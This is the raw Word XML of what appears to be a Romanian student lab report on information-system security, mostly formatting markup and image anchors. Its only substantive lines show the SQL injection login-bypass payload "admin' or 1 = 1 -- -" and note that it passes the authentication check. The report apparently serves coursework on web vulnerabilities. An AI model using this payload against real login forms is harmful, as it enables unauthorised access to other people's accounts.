      <w:r w:rsidRPr="00D669A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D669A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">admin' or 1 = 1 -- - </w:t>
      </w:r>
      <w:r>
        <w:t>trece de verificarea autentificarii.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA1ABC9" w14:textId="723BA526" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5068F5D9" w14:textId="23FC2824" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1536CE40" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BA0178" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484A67F8" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C1BBC8" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1393AB5C" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE79B63" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DACD44F" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5E7938" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2302670F" w14:textId="53A9B8C1" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D669A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38F06AB5" wp14:editId="058AD63D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-2497018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5046980" cy="2780665"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21457"/>
                <wp:lineTo x="21524" y="21457"/>
                <wp:lineTo x="21524" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="2647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716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6980" cy="2780665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BFA484" w14:textId="478DFD0E" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Se poate observa pagina cu codul sursa SQL, pe gradurile de vulnerabilitate si securitate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FAF15" w14:textId="2D31EA50" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D500191" wp14:editId="0CFA9DF7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-40888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3693160" cy="7979410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21555"/>
                <wp:lineTo x="21503" y="21555"/>
                <wp:lineTo x="21503" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="15318042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3160" cy="797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A41B9B" w14:textId="184B32F2" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4"/>
    <w:p w14:paraId="6A82D263" w14:textId="40C2F373" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B2036B" w14:textId="54320BBA" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7A243C" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A30E0E" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C33CCB" w14:textId="40CA1D87" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5C73EF" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D7E98F" w14:textId="77777777" w:rsidR="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46477D60" w14:textId="55F28373" w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidRDefault="00D669A4" w:rsidP="00D669A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D669A4" w:rsidRPr="00D669A4" w:rsidSect="002B72FC">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E03F" w14:textId="77777777" w:rsidR="002B72FC" w:rsidRDefault="002B72FC" w:rsidP="008E6804">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2EE67330" w14:textId="77777777" w:rsidR="002B72FC" w:rsidRDefault="002B72FC" w:rsidP="008E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ABBE6" w14:textId="77777777" w:rsidR="008E6804" w:rsidRDefault="008E6804" w:rsidP="008E6804">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">                                                                                                                              </w:t>
    </w:r>
    <w:r w:rsidRPr="008E6804">
      <w:t>Securitatea sistemelor informatice</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">                                                                                      </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6368AEBF" w14:textId="0F4DE3D1" w:rsidR="008E6804" w:rsidRDefault="008E6804">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">                                                                                                                                   Chanchian Armin Andrei | AN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D007" w14:textId="77777777" w:rsidR="002B72FC" w:rsidRDefault="002B72FC" w:rsidP="008E6804">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03DD256A" w14:textId="77777777" w:rsidR="002B72FC" w:rsidRDefault="002B72FC" w:rsidP="008E68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3C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AE21850"/>
    <w:lvl w:ilvl="0" w:tplc="5B6EF7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14A00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2C0B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2567F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="289C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060352"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A22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C0DD5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7636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973A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFB8EA62"/>
    <w:lvl w:ilvl="0" w:tplc="B6EE6F3C">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9908179">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="954748787">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1967814114">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="61297106">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1703819474">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="9017187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D93"/>
    <w:rsid w:val="00022EA7"/>
    <w:rsid w:val="002A490C"/>
    <w:rsid w:val="002B72FC"/>
    <w:rsid w:val="003139B0"/>
    <w:rsid w:val="004F5719"/>
    <w:rsid w:val="006658B1"/>
    <w:rsid w:val="006A5DDF"/>
    <w:rsid w:val="006B517D"/>
    <w:rsid w:val="007546DA"/>
    <w:rsid w:val="008B1B98"/>
    <w:rsid w:val="008E6804"/>
    <w:rsid w:val="008F1D93"/>
    <w:rsid w:val="009A3EF2"/>
    <w:rsid w:val="00AE5AA4"/>
    <w:rsid w:val="00B826C3"/>
    <w:rsid w:val="00C6492F"/>
    <w:rsid w:val="00D24E6F"/>
    <w:rsid w:val="00D51003"/>
    <w:rsid w:val="00D669A4"/>
    <w:rsid w:val="00E61247"/>
    <w:rsid w:val="00F64D23"/>
    <w:rsid w:val="00FC6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969FC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B4F3713-68F8-4F4E-8926-638E8C06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8B1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E68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804"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E68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804"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006B51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
    <w:name w:val="--l"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B517D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D51003"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D51003"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D510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5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4D1D7-C572-4BAB-8595-6CC97097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Chanchian</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Armin Chanchian</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-29T11:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-29T15:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>